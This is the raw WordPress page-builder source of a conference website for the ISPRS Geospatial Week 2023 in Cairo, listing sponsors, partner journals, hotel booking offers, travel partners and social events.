href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" 